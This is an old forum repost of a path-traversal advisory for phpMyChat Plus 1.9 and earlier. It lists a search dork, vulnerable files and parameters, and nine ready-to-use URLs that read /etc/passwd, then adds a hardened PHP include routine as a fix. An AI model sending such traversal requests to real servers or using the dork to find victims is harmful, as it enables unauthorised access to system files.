escalation666
Posted November 8, 2006

*******************************************************************************
# Title : PhpMyChat Plus <= 1.9 Multiple Source Code Disclosure Vulnerabilities
# Author : ajann
# Dork : phpMyChat plus
# Vuln;
*******************************************************************************

[Files]
avatar.php
colorhelp_popup.php
color_popup.php
index.php
index1.php
/lib/connected_users.lib.php
/lib/index.lib.php
logs.php
phpMyChat.php3
[/Files]

[Code,1]
connected_users.lib.php Error:
...
...
require("./${ChatPath}/lib/database/".C_DB_TYPE.".lib.php");
require("./${ChatPath}/lib/clean.lib.php");
...
...

Key [:] ChatPath=[file]
Key [:] ChatPath=[file]
Key [:] ChatPath=[file]
Key [:] ChatPath=[file]
Key [:] ChatPath=[file]
Key [:] ChatPath=[file]
Key [:] ChatPath=[file]
Key [:] L=[file]
Key [:] ChatPath=[file]

Example:
http://target.com/path/avatar.php?ChatPath=../../etc/passwd
http://target.com/path/colorhelp_popup.php?ChatPath=../../etc/passwd
http://target.com/path/color_popup.php?ChatPath=../../etc/passwd
http://target.com/path/index.php?ChatPath=../../etc/passwd
http://target.com/path/lib/connected_users.lib.php?ChatPath=../../etc/passwd
http://target.com/path/avatar.php?ChatPath=../../etc/passwd
http://target.com/path/lib/index.lib.php?ChatPath=../../etc/passwd
http://target.com/path/logs.php?L=../../etc/passwd
http://target.com/path/phpMyChat.php3?ChatPath=../../etc/passwd

# ajann,Turkey
# ...
# Im not Hacker!
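For the `require` lines quoted in the advisory, a hardened form is sketched below as an added example; it is not part of the original post and not phpMyChat Plus code. `CHAT_ROOT`, `chat_lib_path()` and the accepted file-name pattern are hypothetical; the point is that the include path is built from a server-side constant and checked after resolution, so a request value such as `ChatPath` never reaches it.

```php
<?php
// Added example, not phpMyChat Plus code. Replaces includes of the form
//   require("./${ChatPath}/lib/clean.lib.php");
// CHAT_ROOT and chat_lib_path() are hypothetical names.

// Set once on the server; never derived from GET, POST or cookie data.
define('CHAT_ROOT', __DIR__);

/**
 * Return the absolute path of a library file under CHAT_ROOT/lib.
 * Throws if the name is malformed or resolves outside that directory.
 */
function chat_lib_path(string $relative): string
{
    // Assumed naming scheme: "clean.lib.php" or "database/mysql.lib.php".
    // No "..", no absolute paths, no NUL bytes, at most one subdirectory.
    if (!preg_match('#^(?:[a-z0-9_]+/)?[a-z0-9_]+\.lib\.php\z#i', $relative)) {
        throw new InvalidArgumentException('illegal library name');
    }

    $base = realpath(CHAT_ROOT . '/lib');
    $full = ($base === false) ? false : realpath($base . '/' . $relative);

    // realpath() resolves symlinks and "..", so the prefix comparison is
    // made on the real location of the file, not on the supplied string.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($full === false || strncmp($full, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException('library not found or outside lib directory');
    }
    return $full;
}

// Intended use in place of the quoted lines (C_DB_TYPE comes from the
// application's own configuration, as in the original code):
//   require chat_lib_path('database/' . C_DB_TYPE . '.lib.php');
//   require chat_lib_path('clean.lib.php');

// Demo with constructed inputs: the traversal value from the advisory is
// rejected by the name check before any file system access happens.
foreach (['clean.lib.php', '../../etc/passwd'] as $candidate) {
    try {
        echo $candidate, ' -> ', chat_lib_path($candidate), PHP_EOL;
    } catch (Exception $e) {
        echo $candidate, ' rejected: ', $e->getMessage(), PHP_EOL;
    }
}
```

The same treatment applies to the `L` parameter listed for logs.php: whatever value it selects should be matched against a fixed set of names on the server rather than concatenated into a path.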